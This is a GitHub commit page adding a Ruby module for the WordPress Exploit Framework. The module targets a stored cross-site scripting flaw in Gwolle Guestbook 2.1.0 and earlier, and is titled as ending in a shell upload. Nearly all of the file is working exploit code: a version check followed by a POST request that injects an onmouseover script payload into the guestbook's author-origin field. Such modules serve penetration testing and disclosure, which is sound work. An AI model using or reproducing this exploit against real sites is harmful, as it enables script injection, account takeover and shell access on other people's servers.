Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 1588c9b

Browse files
committed
Add Gwolle Guestbook <= 2.1.0 stored XSS shell upload
1 parent d9d8699 commit 1588c9b

File tree

1 file changed

+45
-0
lines changed

1 file changed

+45
-0
lines changed
Lines changed: 45 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,45 @@
1+
class Wpxf::Exploit::GwolleGuestbookStoredXssShellUpload < Wpxf::Module
2+
include Wpxf::WordPress::StoredXss
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'Gwolle Guestbook <= 2.1.0 Stored XSS Shell Upload',
9+
author: [
10+
'Radjnies Bhansingh', # Disclosure
11+
'Rob Carr <rob[at]rastating.com>' # WPXF module
12+
],
13+
references: [
14+
['WPVDB', '8785'],
15+
['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_gwolle_guestbook_wordpress_plugin.html']
16+
],
17+
date: 'Mar 01 2017'
18+
)
19+
end
20+
21+
def check
22+
check_plugin_version_from_readme('gwolle-gb', '2.1.1')
23+
end
24+
25+
def vulnerable_page
26+
'the post review page'
27+
end
28+
29+
def store_script
30+
execute_post_request(
31+
url: full_uri,
32+
body: {
33+
'gwolle_gb_function' => 'add_entry',
34+
'gwolle_gb_book_id' => '1',
35+
'gwolle_gb_author_name' => Utility::Text.rand_alpha(5),
36+
'gwolle_gb_author_origin' => "#{Utility::Text.rand_alpha(5)}\" onmouseover=#{xss_ascii_encoded_include_script} a=\"",
37+
'gwolle_gb_author_email' => Utility::Text.rand_email,
38+
'gwolle_gb_author_website' => '',
39+
'gwolle_gb_subject' => Utility::Text.rand_alpha(5),
40+
'gwolle_gb_content' => Utility::Text.rand_alpha(10),
41+
'gwolle_gb_submit' => 'Submit'
42+
}
43+
)
44+
end
45+
end

0 commit comments

Comments
 (0)